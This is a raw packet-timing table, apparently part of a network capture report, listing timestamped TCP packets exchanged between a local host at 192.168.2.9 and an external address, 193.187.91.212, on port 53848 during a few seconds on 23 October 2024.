                                                                                                    Oct 23, 2024 17:25:15.958486080 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.958498955 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.958508968 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.958518028 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.958528042 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.962537050 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:15.964898109 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:15.968045950 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.968071938 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.968133926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.968313932 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.968331099 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.970480919 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.970597029 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.970748901 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.970789909 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:15.973190069 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:15.976401091 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.976412058 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.976422071 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.976433992 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.978763103 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.978878975 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.978996038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.979005098 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.979016066 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.979041100 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:15.979051113 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.200886965 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:16.206717968 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.586929083 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.637630939 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:16.639318943 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:16.643124104 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643146038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643156052 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643348932 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643366098 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643376112 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643384933 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643676996 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643686056 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643695116 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643704891 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643713951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643723011 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.643733978 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.644778967 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.644906998 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:16.644922972 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.216743946 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.222193956 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.269526958 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.311384916 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.425240993 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.428090096 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.430748940 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430763960 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430775881 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430785894 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430860043 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430938005 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430948019 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430957079 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430998087 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.430998087 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.431009054 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.431066036 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.431088924 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.431188107 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.431196928 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433553934 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433564901 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433578014 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433621883 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433662891 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433672905 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433702946 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433712959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.433984041 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.436079025 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.436322927 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.436387062 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.436472893 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.436511993 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.436556101 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.436564922 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.439491987 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.439588070 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.439650059 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.439661026 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.439738035 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.441525936 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.441634893 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.441644907 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.621817112 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.684734106 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.686439991 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:17.690367937 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690443039 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690515995 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690526009 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690556049 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690623999 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690634012 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690670013 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690679073 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690687895 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690732956 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690805912 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690814972 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.690824032 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.691967010 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.692013025 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.692078114 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.692168951 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.692178011 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:17.692188978 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.204571962 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.263164043 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.535470963 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.537736893 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.540004015 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.540909052 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540935040 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540946007 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540956020 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540971994 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540982008 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.540990114 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541399956 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541448116 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541457891 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541465998 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541482925 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541491985 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.541500092 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.542289972 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.543201923 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543237925 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543251038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543294907 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543354988 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543365955 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543394089 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543404102 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.543967962 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.545701981 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.545816898 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.545826912 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.545856953 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.545967102 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.547967911 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.547981977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.549590111 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.549701929 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.549714088 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.549789906 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.549869061 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.555289030 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:18.561034918 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:18.938421965 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.001615047 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.003710032 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.007195950 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007220984 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007232904 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007242918 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007360935 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007370949 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007380009 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007404089 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007414103 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007424116 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007445097 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007455111 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.007472038 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.008265972 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009211063 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009221077 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009285927 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009294987 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009305000 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.009330034 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.199728012 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.263117075 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.376336098 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.378674984 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.380880117 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.381742001 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381763935 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381772995 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381782055 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381798029 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381807089 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381815910 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381896973 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381906033 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381916046 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381925106 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.381941080 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.382011890 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.382020950 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.383332014 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.384121895 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.384131908 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.384195089 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.384494066 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.384615898 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.385309935 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.386313915 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.386430979 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.386470079 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.386637926 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.410594940 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.576276064 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:19.581645012 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.960999966 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:19.999325037 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.000967026 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.004945040 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.004967928 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.004981041 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.004992008 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005072117 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005081892 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005089998 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005172014 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005213022 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005223036 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005232096 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005285978 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005335093 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.005345106 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006499052 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006517887 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006623983 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006699085 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006716013 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.006792068 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.157634974 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.263104916 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.293988943 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.297033072 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.299186945 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.299607038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299671888 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299683094 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299691916 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299701929 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299738884 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299793959 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299803972 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299839973 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299956083 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299964905 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299974918 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299983978 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.299993038 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.301887035 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.303077936 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.303332090 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.303395987 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.303406954 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.303885937 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.304677963 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.304769039 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.304898977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.304943085 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.304953098 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.305073977 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.305119991 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.307686090 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.307838917 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.309601068 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.309730053 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.309787989 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.310137033 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.591763020 CEST4997853848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:20.597170115 CEST5384849978193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.980178118 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:20.982197046 CEST5384849980193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.118490934 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:21.120106936 CEST4997953848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:21.124062061 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124089956 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124242067 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124253035 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124316931 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124326944 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124336958 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124515057 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124526024 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124535084 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124546051 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124553919 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124563932 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.124572992 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.125554085 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.125679016 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.125767946 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.125777960 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.125786066 CEST5384849979193.187.91.212192.168.2.9
                                                                                                    Oct 23, 2024 17:25:21.153738976 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:21.411086082 CEST4998053848192.168.2.9193.187.91.212
                                                                                                    Oct 23, 2024 17:25:21.413466930 CEST4998053848192.168.2.9193.187.91.212
